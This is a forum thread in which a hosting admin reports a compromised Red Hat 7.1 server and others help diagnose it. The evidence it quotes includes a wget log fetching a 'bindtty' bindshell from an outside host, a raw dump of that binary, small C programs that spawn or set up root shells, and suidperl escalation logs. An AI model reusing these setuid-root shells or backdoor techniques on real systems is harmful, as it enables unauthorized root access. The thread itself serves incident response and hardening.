This showed up in the logs of one of my servers!:angry:



--01:24:39-- http://raky.home.cosmic-cp/
=> `index.html.1'
Resolving raky.home.cosmic-cp... failed: Host not found.
--01:26:41-- http://raky.home.cosmic-cow.net/bindtty
=> `bindtty'
Resolving raky.home.cosmic-cow.net... done.
Connecting to raky.home.cosmic-cow.net[69.31.32.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,637 [text/plain]

0K .......... .. 100% 108.25 KB/s

01:26:47 (108.25 KB/s) - `bindtty' saved [12637/12637]

Search results for: ! NET-69-31-32-0-1


OrgName: Quantum Tech Pty Ltd
OrgID: QTPL
Address: P.O. Box 6111
Address: Girrawheen
City: Perth
StateProv: WA
PostalCode: 6064
Country: AU

NetRange: 69.31.32.0 - 69.31.39.255
CIDR: 69.31.32.0/21
NetName: NLYR-69-31-32-0-1
NetHandle: NET-69-31-32-0-1
Parent: NET-69-31-0-0-1
NetType: Reallocated
NameServer: NS1.QUANTUM-TECH.COM
NameServer: NS2.QUANTUM-TECH.COM
Comment:
RegDate: 2003-04-12
Updated: 2003-04-12

OrgTechHandle: MVA6-ARIN
OrgTechName: Van Essen, Mike
OrgTechPhone: +61 8 9343 0428
OrgTechEmail: mike@quantumtech.net.au

# ARIN WHOIS database, last updated 2004-07-04 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.


Called this number and they are saying that they do not know any mike or quantumtech.

PS -aux
---------------------------------------------------------------------------------
xxxxx 15978 0.0 0.0 1484 4 ? S Jul01 0:00 ./bindtty
xxxxx 14456 0.0 0.0 2380 48 ? S Jul01 0:00 SCREEN
xxxxx 14457 0.0 0.0 2204 52 pts/0 S Jul01 0:00 /bin/sh
xxxxx 14463 0.0 0.0 1404 8 pts/0 S Jul01 0:00 ./suck
xxxxx 14464 0.0 0.0 1384 4 pts/0 S Jul01 0:00 ./suck
------------------------------------------------------------------------------------

Anyone seen this before?

Pulling up http://raky.home.cosmic-cow.net/bindtty

Gives the following:
ELF


 
€‰4 � 4  (    4 4€4€À À    ô

ô€ô€  

€ €X X  
X X¦X¦|
„
   d

d¦d¦È È    
��   /lib/ld-linux.so.2  
GNU 


% %   # !   
 

 $       


     
 

   " k h‡|  õ x‡q  5 ˆ‡Ý  ¡

˜‡Z  ˆ ¨‡Û  O ¸‡ø  H ȇ”  ” ؇  ' è‡g  �

ø‡›
 d ˆx  š ˆ9  î (ˆ.  æ 8ˆ6  Ô§   

Hˆž  { Xˆ6  Ú hˆ¯  \ xˆ:  È ˆˆ
 < ˜ˆ:  §

¨ˆ9  v ¸ˆ9  . Ȉ'  á ؈|  V èˆ6  ´ øˆÙ  

‰<  ® ‰  ¹ _•   q (‰:  ¦ 8‰4  A H‰9  �

X‰|  û  h‰0  libc.so.6 strcpy waitpid ioctl stdout execve memcpy

perror dup2 socket select fflush bzero setpgid accept write kill bind chdir memchr signal read

htonl listen fork sprintf htons exit _IO_stdin_used __libc_start_main strlen open vhangup setsid

close __gmon_start__ GLIBC_2.0                             
 

  


 ii


Ч# Ô§ L§
P§ T§ X§ \§

`§ d§ h§ l§ p§
t§ x§ |§
€§ „§ ˆ§ Œ§

�§ ”§ ˜§ œ§ _§ ¤§ ¨§ ¬§ °§ ´§ ¸§ ¼§

À§ ħ! ȧ" ̧$ U‰åƒìèY èÀ èû
ÉÃ ÿ5D§ÿ%H§ ÿ%L§h éàÿÿÿÿ%P§h

éÐÿÿÿÿ%T§h éÀÿÿÿÿ%X§h é°ÿÿÿÿ%\§h é_ÿÿÿÿ%`§h( é�ÿÿÿÿ%d§h0 é€ÿÿÿÿ%h§h8

épÿÿÿÿ%l§h@ é`ÿÿÿÿ%p§hH éPÿÿÿÿ%t§hP é@ÿÿÿÿ%x§hX é0ÿÿÿÿ%|§h` é ÿÿÿÿ%€§hh

éÿÿÿÿ%„§hp é ÿÿÿÿ%ˆ§hx éðþÿÿÿ%Œ§h€ éàþÿÿÿ%�§hˆ éÐþÿÿÿ%”§h� éÀþÿÿÿ%˜§h˜

é°þÿÿÿ%œ§h_ é_þÿÿÿ%_§h¨ é�þÿÿÿ%¤§h° é€þÿÿÿ%¨§h¸ épþÿÿÿ%¬§hÀ é`þÿÿÿ%°§hÈ

éPþÿÿÿ%´§hÐ é@þÿÿÿ%¸§hØ é0þÿÿÿ%¼§hà é þÿÿÿ%À§hè éþÿÿÿ%ħhð é þÿÿÿ%ȧhø

éðýÿÿÿ%̧h
éàýÿÿ 1í^‰áƒäðPTRh•hà”QVhhŒèçþÿÿô��U‰åSè [�Ó P‹ƒ�

…ÀtÿЋ]üÉÃ����������U‰åƒì€=ا u-¡`¦‹…Òt�¶

ƒÀ£`¦ÿÒ¡`¦‹…ÒuëÆا
ÉÉöU‰åƒì¡<§…Àt¸

…ÀtÇ$<§èÌuû÷‰ì]ÃU‰åƒìh¡¤•‰EØ¡¨•‰EÜ¡¬•‰Eà¡°•‰E䶴•ˆE衵•‰E¸¡¹•‰E¼¡½•‰EÀ¡Á•

‰EĶŕˆEÈ‹E‰$èËýÿÿ‰E´‹E‰D$‹E‰$è¶þÿÿ‹E´‹U
‹EÁøƒà¶D(؈‹E´E�P
‹Eƒà¶D(¸ˆ‹E´E

ƒÀÆ ÉÃU‰å�ì( ÇD$ Ç$Æ•èÍýÿÿ‰…ðýÿÿ‹…ðýÿÿ‰$èYüÿÿÇ…ôýÿÿ �½ôýÿÿÿ ~é´

�…øýÿÿ‰D$ÇD$Е‹…ôýÿÿ‰$èÞþÿÿÇD$ �…øýÿÿ‰$èhýÿÿ‰Â‹E‰‹Eƒ8

yë`�…øýÿÿ‰D$ÇD$Ù•‹…ôýÿÿ‰$è—þÿÿÇD$ �…øýÿÿ‰$è!ýÿÿ‰Â‹E‰‹Eƒ8 y‹E‹ ‰$è¥ûÿÿëÇ…ìýÿÿ


ë�…ôýÿÿÿ é;ÿÿÿÇ…ìýÿÿ ‹…ìýÿÿÉÃU‰åƒìÇD$ ŒÇ$ èŽûÿÿÇD$
ÇD$

Ç$ÿÿÿÿèüÿÿÉÃU‰åƒìÇD$
Ç$ èÖüÿÿÇD$ Ç$ èÂüÿÿÉÃU‰åW�ìtˆ
ƒäð¸ )ÄÇD$ ÇD$


Ç$ è°üÿÿ‰Eă}Ä yÇ$â•èÛúÿÿÇ…´wþÿ
é ÇD$ �E؉$èüÿÿfÇEØ Ç$ è÷úÿÿ‰EÜÇ$³

è(üÿÿf‰EÚÇD$ �E؉D$‹Eĉ$èªûÿÿ…ÀyÇ$é•èjúÿÿÇ…´wþÿ
éš ÇD$

‹Eĉ$èØúÿÿ…ÀyÇ$î•è8úÿÿÇ…´wþÿ
éh Ç$õ•è=ûÿÿ¡Ô§‰$è@úÿÿèúÿÿ‰Eôƒ}ô

t"‹Eô‰D$Ç$–èûÿÿÇ…´wþÿ é è{úÿÿÇ$–èŸúÿÿÇD$ Ç$–èûÿÿ‰EôÇD$

‹Eô‰$èµúÿÿÇD$
‹Eô‰$è¢úÿÿÇD$ ‹Eô‰$è�úÿÿ‹Eô‰$èdùÿÿÇD$
Ç$
è€ùÿÿÇD$ ŒÇ$

èlùÿÿÇE¼ �E¼‰D$�EȉD$‹Eĉ$è¬ùÿÿ‰EÀƒ}À yëÕè,ùÿÿ‰Eôƒ}ô …> Ç…ÿÿ%–Ç…ÿÿ(–Ç… ÿÿ

�…xþÿ‰…{ÿÿÇD$–ÇD$+–�…xþÿ‰$èwúÿÿÇ…yþÿ ÇD$


�•yþÿ‹…yþÿÁà�‰D$‹EÀ‰$èdúÿÿ‰…yþÿ‹�yþÿ�•yþÿ‹…yþÿÁà�‰„�{ÿÿ�…yþÿÿ �½yþÿÿ (�½yþÿÿ

~‹…yþÿÁà�Uø
Ð-à‡
€8
…vÿÿÿ‹…yþÿÇ„…{ÿÿ ÇD$ Ç$ èþøÿÿ�E°‰D$�E´‰$èbûÿÿ…À…ƒ

¡3–‰…èwþÿ¡7–‰…ìwþÿ¡;–‰…ðwþÿ¡?–‰…ôwþÿ¡C–‰…øwþÿ·G–f‰…üwþÿ�…èwþÿ‰$è�øÿÿ‰D$�…èwþÿ‰D$

‹EÀ‰$èh÷ÿÿ‹EÀ‰$èm÷ÿÿÇ$ èáøÿÿè|÷ÿÿ‰E¸ƒ}¸ …Å ‹E°‰$èD÷ÿÿèï÷ÿÿÇD$T

‹E´‰$è¼øÿÿ‹EÀ‰$è!÷ÿÿ‹Eĉ$è÷ÿÿÇD$ Ç$
è2÷ÿÿÇD$ Ç$ è÷ÿÿÇD$ ‹E´‰$èû÷ÿÿÇD$


‹E´‰$èè÷ÿÿÇD$

‹E´‰$èÕ÷ÿÿ‹E´‰$èªöÿÿ�…{ÿÿ‰D$�…ÿÿ‰D$Ç$I–èúöÿÿ‹E´‰$èöÿÿÇD$8ŒÇ$
è›öÿÿÇD$8ŒÇ$

è‡öÿÿ¸ ¹ �½(ÿÿÿüó«‰È‰…äwþÿ‰ø‰…àwþÿ‹E°‰ÂÁê‹E°ƒà«„•(ÿÿÿ‹EÀ‰ÂÁê‹EÀƒà«„•(ÿÿÿÇD$

ÇD$ ÇD$ �…(ÿÿÿ‰D$‹E°;EÀ~‹E°@‰…°wþÿë
‹UÀB‰•°wþÿ‹…°wþÿ‰$è
öÿÿ…Àyé£

‹E°‰Âƒâ‹E°Á裔…(ÿÿÿ’À„ÀtYÇD$ € �…(ÿÿ‰D$‹E°‰$èW÷ÿÿ‰…àwþÿƒ½àwþÿ éU

‹…àwþÿ‰D$�…(ÿÿ‰D$‹EÀ‰$è4õÿÿ…Àé- ‹EÀ‰Âƒâ‹EÀÁ裔…(ÿÿÿ’À„À„Ãþÿÿ�…(ÿÿ‰…ÜwþÿÇD$ €

�…(ÿÿ‰D$‹EÀ‰$èÑöÿÿ‰…àwþÿƒ½àwþÿ éÏ
�…(ÿÿ‹•àwþÿ‰T$ÇD$ ‰$è=õÿÿ‰…äwþÿƒ½äwþÿ „u


�•(ÿÿ‹…äwþÿ)Љ‹…àwþÿ)Љ…Äwþÿƒ½Äwþÿ~
Ç…Äwþÿ ‹…Äwþÿ‰D$‹…äwþÿ‰D$�…Èwþÿ‰$è§õÿÿƒ½Äwþÿ*¸

+…Äwþÿ‰D$�…Èwþÿ…Äwþÿ‰D$‹EÀ‰$èöÿÿfÇ…¾wþÿ fÇ…¼wþÿ

¶…ÉwþÿÁàf¶•Êwþÿ
Ðf‰…ºwþÿ¶…ËwþÿÁàf¶•Ìwþÿ
Ðf‰…¸wþÿ�…¸wþÿ‰D$ÇD$T ‹E°‰$èOõÿÿÇD$ Ç$

è[õÿÿ�•(ÿÿ‹…äwþÿ)ЉD$�…(ÿÿ‰D$‹E°‰$ètóÿÿ�…(ÿÿ…àwþÿ+…äwþÿƒè‰…Äwþÿƒ½Äwþÿ

Žýÿÿ‹…Äwþÿ‰D$‹…äwþÿƒÀ‰D$‹E°‰$è*óÿÿéÞüÿÿ‹…àwþÿ‰D$‹…Üwþÿ‰D$‹E°‰$èóÿÿ…À�·üÿÿ‹EÀ‰$èóÿÿ‹E

ĉ$èøòÿÿ‹E°‰$èíòÿÿÇD$ ÇD$ ‹E¸‰$è¢óÿÿè�óÿÿÇ$

èAôÿÿ‹EÀ‰$è¶òÿÿéuùÿÿ‹…´wþÿ‹}üÉÃ��������������U‰åVS1ÛèTòÿÿ¸X¦-X¦Áø9Ãs‰Æ�ÿ�X¦C9órô[^]ÃU¸X

¦-X¦Áø‰åƒì‰]ü…À�Xÿu‹]ü‰ì]éH ÿ�X¦‰ØK…Àuòëå��������U‰åSƒì¡,§»,§ƒøÿt�v �¼'

ƒëÿЋƒøÿuôX[]ÃU‰åSè [�÷ Rè:ôÿÿ‹]üÉà 
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx

/dev/pty /dev/tty socket bind listen Daemon is starting... OK, pid = %d
/ /dev/null sh -i

HOME=%s Can't fork pty, bye!
/bin/sh 8§

 @‡
€• (�

¨„ X‚

    @§ 
   8† (†   

þÿÿo†ÿÿÿo
ðÿÿo¼… ÿÿÿÿ ÿÿÿÿ d¦



n‡~‡Ž‡ž‡®‡¾‡·Þ‡î‡þ‡ˆˆ.ˆ>ˆNˆ^ˆnˆ~ˆŽˆžˆ®ˆ¾ˆΈÞˆî

ˆþˆ‰‰.‰>‰N‰^‰n‰ GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3,

propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3

20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4

3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC:

(GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo

Linux 1.4 3.2.3-r3, propolice) ,   €• @‡ ¤‰" $  _ 

–• U‡ œ  


/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6
€œ   
¦

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6
€
 %


% ¢  Y

û







/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crti.S
ۥ2
,Wd




@‡"
,:

¤‰
,Wdd,,-:


€  Y

û







/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crtn.S
–•
:




U‡



.symtab .strtab .shstrtab .interp .note.ABI-tag .hash .dynsym .dynstr

.gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame .data .dynamic

.ctors .dtors .jcr .got .bss .comment .debug_aranges .debug_info .debug_abbrev .debug_line


 ô€ô 
#   �


 1   (�(
0
   7   X‚X P 
 

?   ¨„¨ 

G ÿÿÿo ¼…¼ J    T þÿÿo

† 
 c  (†(     l  8†8 


    u
 @‡@   p
 X‡X   

{
 €‰€   �
 €•€   ‡


œ•œ µ  �
 T–T   ™
 X¦X 

 Ÿ   d¦d È    ¨
 ,§,   ¯


 4§4   ¶
 <§<   »
 @§@ ”

  À   Ô§Ô   Å
Ô Î

Î


¨ X  Ý
 @

é
@


÷
` *

  Š 




 h" à  R    H+ 


ô€ 
�   (�   X‚   ¨„   ¼…

  †   (†   8†  @‡ 
X‡   €‰

  ۥ 
œ•   T–   X¦   d¦   ,§

  4§   <§   @§   Ô§    

            


 ñÿ  ñÿ
 ñÿT  ñÿ_  ñÿj 

ñÿ_  ñÿ  ñÿ_  ñÿ
 ñÿ  ñÿ


ñÿT  ñÿ_  ñÿ³  ñÿº  ñÿ
 ñÿF


ñÿº  ñÿ
 ñÿ  ñÿ
 ñÿT  ñÿº 

ñÿQ
¤‰   a
 ñÿl
,§
 z
4§
 ˆ
T–
 ›
<§


¨
`¦
 ¬
ا

 ¸
Љ   Î
Š   a
 ñÿÚ
0§


ç
8§
 ô
T–
  <§
  P•   $  ñÿ


ñÿF
 ñÿ$  ñÿ
 ñÿ  ñÿ
 ñÿT 

ñÿ$  ñÿj  ñÿt  ñÿ d¦   ˆ h‡|  ™ 8Œ0  

¡ x‡q  ² Œ8   ¼ œ•   à ˆ‡Ý  Õ ˜‡Z  å ¨‡Û 

÷ ¸‡ø   X¦  ñÿ ȇ”  , ؇  = \¦  J •8

  Z è‡g  l ø‡›
 ~ ˆx  � @‡ 
– ˆ9  ¨ (ˆ.

 º 8ˆ6  Í Ô§   ß Hˆž  ò îŠ
  û €‰    Xˆ6 

 hˆ¯  % 8Š¶   - X¦  ñÿ@ à”0   P Ô§  ñÿ\ hŒj  

a xˆ:  t ˆˆ
 ‘ X¦  ñÿ¢ ˜ˆ:  ² X¦  ½ ¨ˆ9 

Ï ¸ˆ9  ß €• 
å Ȉ'  ÷ ؈|   èˆ6   øˆÙ 

( Ô§  ñÿ/ @§   E ܧ  ñÿJ ‰<  [ ‰  l X¦ 

ñÿ _•   Ž (‰:  ž 8‰4  ± X¦   ¾ H‰9  Ð

ä X‰|  ô  h‰0  <command line>

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/config.h <built-in> abi-note.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/abi-tag.h init.c

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S

/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/defs.h initfini.c call_gmon_start

crtstuff.c __CTOR_LIST__ __DTOR_LIST__ __EH_FRAME_BEGIN__ __JCR_LIST__ p.0 completed.1

__do_global_dtors_aux frame_dummy __CTOR_END__ __DTOR_END__ __FRAME_END__ __JCR_END__

__do_global_ctors_aux /var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S

bindtty.c elf-init.c _DYNAMIC write@@GLIBC_2.0 hangout close@@GLIBC_2.0 sig_child _fp_hw

perror@@GLIBC_2.0 fork@@GLIBC_2.0 signal@@GLIBC_2.0 fflush@@GLIBC_2.0 __fini_array_end

select@@GLIBC_2.0 htonl@@GLIBC_2.0 __dso_handle __libc_csu_fini execve@@GLIBC_2.0

memchr@@GLIBC_2.0 accept@@GLIBC_2.0 _init listen@@GLIBC_2.0 setsid@@GLIBC_2.0 vhangup@@GLIBC_2.0

stdout@@GLIBC_2.0 waitpid@@GLIBC_2.0 open_tty _start chdir@@GLIBC_2.0 strlen@@GLIBC_2.0 get_tty

__fini_array_start __libc_csu_init __bss_start main setpgid@@GLIBC_2.0

__libc_start_main@@GLIBC_2.0 __init_array_end dup2@@GLIBC_2.0 data_start printf@@GLIBC_2.0

bind@@GLIBC_2.0 _fini memcpy@@GLIBC_2.0 open@@GLIBC_2.0 bzero@@GLIBC_2.0 exit@@GLIBC_2.0 _edata

_GLOBAL_OFFSET_TABLE_ _end ioctl@@GLIBC_2.0 htons@@GLIBC_2.0 __init_array_start _IO_stdin_used

kill@@GLIBC_2.0 sprintf@@GLIBC_2.0 __data_start socket@@GLIBC_2.0 _Jv_RegisterClasses

read@@GLIBC_2.0 __gmon_start__ strcpy@@GLIBC_2.0


Holy??:angry: I don't like the looks of this..

I just grepped for files changed on the 1st of July, and lo and behold I found the bastard bindtty sitting in a Ikonboard 3.1.1 cgi script folder.

Is this deffinetly the way it go in the system and if so will removing or upgrading the script prevent it from happening again?

i suspect bindtty is just a bindshell that opens port 5299 and allows people to connect to your server as whatever user the program is run at..

if its in an ikonboard dir i expect they've hacked you via some insecure script and got in as your httpd uid. might be worth doing a further search around your system to see if they've done anything else

oh, and cosmic-cow.net looks like some free shell provider

and why hide the uids on your paste? it just stops people helping, nothing can really be gained from knowing htem ;)

It is a vhost UID not apache, do you think it was isolated to the UID the bindtty was setup under?

i suspect bindtty is just a bindshell that opens port 5299

They cannot connect to port 5299 if the firewall has blocked that port right? Do you think that they could have chnaged or taken out the ipchains?

Originally posted by Xhost
They cannot connect to port 5299 if the firewall has blocked that port right? Do you think that they could have chnaged or taken out the ipchains?


Only if you were rooted and in that case you need an os reinstall

What OS were your running by the way ?

RH LINUX 7.1

Chrootkit shows no signs of rootkits,

rpm -q -f /bin/ls/ -s | grep /bin/ls/

Seems fine, checking rest of systools now.

I don't think they got the log wiper going cuase I got them in an error.log Going to see if I can find out who upped the file, hopefully they used ftp?

Going to cross-reference that time frame also with the other logs if no trace of rooting.

PERL is run under SUEXEC on that server, so you think it would have had to have been a perl file they exploited? There is a good chance that they expoited IkonBoard?

I see some css and some cookie exploit warnings on the IkonBoard site with fixes, I just installed them, but I'm not sure if that was where they came in from in the first place?

Looking at SuExec log now.

It could be a PHP based exploit.. See a few on our RH9 systems..

Thats what I thought at first something like phpshell.php or the like, but it would make no sense why they would put the file inside of the /cgi-bin folder, as it is outside of the /httpdocs or /public folder.

If it was a php script how will I be able to find the hole exactly so that I can block them from coming back. I have clean backups, and a clean CD with my sysfiles on it, but I would rather plug the hole first. Anyone got any suggestions? Keeping in mind that php is not run under SUEXEC on this box.

Well, this may be worst then I thought, I appears the logs mysqld.log, spooler.log, xferlog.log, netcfg.log have all been cleared :mad:

Can anyone suggest the next course of action?

How else would I be able to tell for sure if this box has been rooted?

Bash.hist is showing nothing odd, there is a wierd file in my root folder called no-install.php, it doesnt seem familiar, but when I open it it contains a copy of another text file I have and nothing else? Thats really weird, but is that enough to constitute a root compromise?

you should probably wipe the server just incase.

I ran rkhunter and it found nothing either, but there are some very strange things in my /tmp folder!! LOOK:

FILENAME: bighole and bighole.c

CONTENTS OF BIGHOLE.C
main() {
setuid(0);
setgid(0);
chown("sush",0,0);
chmod("sush",04755);
}

FILE:
such.c

CONTENTS OF SUCH.C
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}

THE FILE SUCK is also here in my tmp folder!

also this :

a folder named tksysv-backup

And a folder name "flare"

CONTENTS OF FLARE:

#!/usr/bin/suidperl

print "Nothing can stop me now...\n";


I'm not going to wipe this box untill I find out how he got in exactly and get this hole plugged! Please help.

XHost i highly suggest you wipe the server and have fedora or something installed. Maybe even redhat 9 and upgrade with YUM to centos. After that get the server locked down. That os is not supported by redhat and you are going to have more troble then its worth down the road.

I have seen these files on one our servers as well. This was due to an insecure tmp directory. Cpanel provided a fix for this.

We ended up with these files since php was not running under phpsuexec, and a php script was used to exploit the server.

Since some files with root privileges WERE overwritten, i would suggest that you reinstall the system as well and ensure that;

1. Use phpsuexec
2. make your tmp directory secure (not sure what the exact command are right now, but i did see them some where on WHT)

By the way, try a chkrootkit scan (http://www.chkrootkit.org), it might reveal something significant (some other hidden directories etc).

Also, check the group/user privileges of the files in tmp, they might reveal the user who exploited the server. Going through his logs and directories might reveal the actual exploit used.

Guess what I found

http://www.safechina.net/www_hack_co_za/redhat/6.1/xperl_sh.htm

It seems to be a perl exploit!!!!

Here is another link i found

http://project.honeynet.org/scans/scan19/scan/som19/rootkitdetail.html

try searching for all .tar.gz file to find the user who exploited the system..

This is how we found out about the user who abused his privileges.

Thats sure it alright! Thanks

No problem. By the way, were you offering customers shell access to your servers?

How did they get that crap into /tmp , did they upload it via a perl script?

In our case, the culprit was a PHP script.

I think it was an insecure installation of phpnuke. It might be the same in your case as well..

I saw once a perl script which open a small telnet server.
I think he used it then he gained root then installed this rootkit you have now.

Insecure phpnuke, most commonly coppermine or my_egallery addons are the most common ways. This is a very common attack.


I saw once a perl script which open a small telnet server.
I think he used it then he gained root then installed this rootkit you have now.


Not uncommon there is even backconnect backdoors that work if you have incoming blocked restricted but outgoing is open, thus bypassing your firewall.

If i remember correctly, it was indeed the my_egallery addon but the shell that was opened was not root....

thelinuxguy, any idea why xhost was rooted in this case?

This is the only thing I can dig up from what was left in the logs:

Secure.log
Jul 1 01:43:29 x1 xinetd[9660]: START: smtp pid=26658 from=208.254.72.2
Jul 1 01:43:39 x1 xinetd[9660]: START: smtp pid=31470 from=209.104.223.40
Jul 1 01:43:40 x1 suidperl[31973]: User 10019 tried to run dev 2054 ino 96737 in place of dev 2055 ino 325!
Jul 1 01:43:40 x1 suidperl[31973]: Filename of setuid script was ./none ~!bighole , uid 10019 gid 10001.
Jul 1 01:43:44 x1 suidperl[1722]: User 10019 tried to run dev 2054 ino 96737 in place of dev 2055 ino 325!
Jul 1 01:43:44 x1 suidperl[1722]: Filename of setuid script was ./none ~!bighole , uid 10019 gid 10001.
Jul 1 01:43:53 x1 xinetd[9660]: START: smtp pid=6225 from=84.97.101.220
Jul 1 01:44:02 x1 xinetd[9660]: START: smtp pid=11140 from=69.59.140.107
Jul 1 01:44:06 x1 xinetd[9660]: START: smtp pid=13044 from=69.59.165.200
Jul 1 01:44:07 x1 xinetd[9660]: START: smtp pid=13541 from=65.18.216.91
Jul 1 01:44:09 x1 xinetd[9660]: START: smtp pid=14262 from=69.59.165.196
Jul 1 01:44:12 x1 suidperl[15757]: User 10019 tried to run dev 2054 ino 96737 in place of dev 2055 ino 325!
Jul 1 01:44:12 x1 suidperl[15757]: Filename of setuid script was ./none ~!bighole , uid 10019 gid 10001.
Jul 1 01:44:17 x1 suidperl[18335]: User 10019 tried to run dev 2054 ino 96737 in place of dev 2055 ino 325!
Jul 1 01:44:17 x1 suidperl[18335]: Filename of setuid script was ./none ~!bighole , uid 10019 gid 10001.
Jul 1 01:44:19 x1 xinetd[9660]: START: smtp pid=19120 from=216.235.122.93
Jul 1 01:44:24 x1 xinetd[9660]: START: smtp pid=21979 from=209.40.99.8
Jul 1 01:44:33 x1 xinetd[9660]: START: smtp pid=26173 from=68.36.98.124
Jul 1 01:44:34 x1 suidperl[26715]: User 10019 tried to run dev 2054 ino 96737 in place of dev 2055 ino 325!
Jul 1 01:44:34 x1 suidperl[26715]: Filename of setuid script was ./none ~!bighole , uid 10019 gid 10001.
Jul 1 01:44:34 x1 xinetd[9660]: START: smtp pid=26839 from=205.188.157.34
Jul 1 01:44:34 x1 xinetd[9660]: START: smtp pid=27049 from=63.209.157.12

All the rootkit files in the /tmp folder where also UID 10019, but that is my UID.

try : cat /etc/passwd | grep 10019

Oops... I guess I am too stoned (its around 2:40 a.m. here right now). If the UID's are your own, then you were definatley rooted!

I guess I have to close the case and wipe this box clean, I just do not want to wipe it and then have the same thing happen again. I'm not sure if I have found the hole or not. I amd thinking that it was ikonboard, but Im not 100% positive.

Upgrade to Fedora, As far as I can tell, this is a problem with Redhat prior to version 8.0.

There are 3 copies of phpnuke on this box, and one of them has a coppermine plugin. But they do not seem to be related as like I said the bindtty file was found in my Ikonboard folder and the secure.log file states that it was My UID & GID that was used to execute the bighole. Do you think they used the Ikonboard, I just patched it up now. Since there are no other signs of rootkits do you think I should still wipe, I probably should. Just gets me how both chrootkit and rkhunter are showing nothing throughout this whole issue.

I guess its time to pull out the old sniffer again.

Thanks for your help guys, I have RHEL3 but was saving it for a fresh server.

Now I guess I will have alot of work instead.

If anyone has anything to add, please let me know.

Xhost,
Go for fedora :) Thats all i have to say for today...

xhost, it didn't find any root kits because they probably deleted them. your ps, wget, etc, have probably all been replaced to make it seem like nothing is wrong while there is bindtty running in the background.

Ya, I know it's a write off now, I'm going to write this one off, as a lesson learned and make sure the new box will be much tighter.

I left the RH 7.1 on for a big client as they specifically wanted The PLESK5 CP for some reason. But now they will have to upgrade. I held it out for as long as I could. 2 years past it's lifecycle, I think that was pretty good.

Here lies my little RH 7.1 box, he fell into a BIGHOLE and couldn't get up! You will be missed but never forgotten, RIP, :bawling:

it shouldn't be a big deal putting Plesk7.1 on RHE, for the most part its the same.

Yes, if it was a clean install it would be really easy, but I have to bring now the customers from the old RH7.1 box, up to the RHEL3.

Since PLESK was modularly built around each Distro, PLESK 5 Works only on RH7.x, PLESK 6 on RH7.x, RH8 & RH9, and PLESK 7 Finally on RHEL3. This means a process which backs up, formats,installs the OS then The new CP version and then restores the Customer data each step of the way aswell.

I better get a bigger coffee mug.

I will be worth it though.

Oh ya, and becuase I missed the question earlier, No I do not offer SSh, or telnet to my customers on shared boxes, but because I offer PERL, PHP, ASP and CFMX It is similar.

For anyone out there wondering, the /tmp partition can be secured by editing fstab and mounting it with the noexec, and nosuid params. Search for securing tmp on google and you will find it.

Its not full proof however, also

/tmp
/var/tmp
/etc/httpd/proxy
/var/spool/mail
/etc/rpm

are common hiding places.